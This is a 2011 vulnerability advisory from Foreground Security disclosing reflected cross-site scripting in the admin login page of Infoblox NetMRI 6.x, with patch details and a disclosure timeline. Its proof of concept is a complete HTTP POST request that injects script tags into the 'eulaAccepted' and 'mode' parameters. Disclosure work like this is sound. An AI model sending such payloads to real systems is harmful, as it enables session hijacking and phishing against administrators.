Infoblox NetMRI 6.2.1 Cross Site Scripting

`============================================================  
FOREGROUND SECURITY, SECURITY ADVISORY 2011-004  
- Original release date: November 10, 2011  
- Discovered by: Jose Carlos de Arriba - Senior Security Analyst at Foreground Security  
- Contact: (jcarriba (at) foregroundsecurity (dot) com, dade (at) painsec (dot) com)  
- Severity: 4.3/10 (Base CVSS Score)  
============================================================  
  
I. VULNERABILITY  
-------------------------  
Infoblox NetMRI 6.2.1 (latest version available when the vulnerability was discovered), 6.1.2 and 6.0.2.42 Multiple Cross Site Scripting - XSS (prior versions have not been checked but could be vulnerable too).  
  
II. BACKGROUND  
-------------------------  
Infoblox NetMRI is a network automation solution for configuration, optimization and compliance enforcement. With hundreds of built-in rules and industry best practices, it automates network change, intelligently manages device configurations and reduces the risk of human error.   
  
III. DESCRIPTION  
-------------------------  
Infoblox NetMRI 6.2.1 (latest version available when the vulnerability was discovered), 6.1.2 and 6.0.2.42 presents multiple Cross-Site Scripting vulnerabilities on its "eulaAccepted" and "mode" parameters in the admin login page, due to an insufficient sanitization on user supplied data and encoding output.  
A malicious user could perform session hijacking or phishing attacks.  
  
IV. PROOF OF CONCEPT  
-------------------------  
POST /netmri/config/userAdmin/login.tdf HTTP/1.1  
Content-Length: 691  
Cookie: XXXX  
Host: netmrihost:443  
Connection: Keep-alive  
Accept-Encoding: gzip,deflate  
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)  
  
formStack=netmri/config/userAdmin/login&eulaAccepted=<script>alert(document.cookie)</script>&mode=<script>alert(document.cookie)</script>&skipjackPassword=ForegroundSecurity&skipjackUsername=ForegroundSecurity&weakPassword=false  
  
V. BUSINESS IMPACT  
-------------------------  
An attacker could perform session hijacking or phishing attacks.  
  
VI. SYSTEMS AFFECTED  
-------------------------  
Infoblox NetMRI 6.2.1 (latest), 6.1.2 and 6.0.2 branches (prior versions have not been checked but could be vulnerable too).  
  
VII. SOLUTION  
-------------------------  
Vulnerability fixed on 6.2.2 version - available as of 10 Nov 2011  
  
Also the following security patches are available:  
  
- v6.2.1-NETMRI-8831  
- v6.1.2-NETMRI-8831  
- v6.0.2-NETMRI-8831  
  
  
VIII. REFERENCES  
-------------------------  
http://www.infoblox.com/en/products/netmri.html  
http://www.foregroundsecurity.com/  
http://www.painsec.com  
  
IX. CREDITS  
-------------------------  
This vulnerability has been discovered by Jose Carlos de Arriba (jcarriba (at) foregroundsecurity (dot) com, dade (at) painsec (dot) com).  
  
X. REVISION HISTORY  
-------------------------  
- November 10, 2011: Initial release.  
  
XI. DISCLOSURE TIMELINE  
-------------------------  
August 28, 2011: Vulnerability discovered by Jose Carlos de Arriba.  
August 28, 2011: Vendor contacted by email.  
August 29: Vendor response asking for details.  
September 21, 2011: Security advisory sent to vendor.  
November 10, 2011: Security Fix released by vendor.  
November 10, 2011: Security advisory released.  
  
  
XII. LEGAL NOTICES  
-------------------------  
The information contained within this advisory is supplied "as-is"with no warranties or guarantees of fitness of use or otherwise.  
  
Jose Carlos de Arriba, CISSP  
Senior Security Analyst  
Foreground Security  
www.foregroundsecurity.com  
jcarriba (at) foregroundsecurity (dot) com  
  
`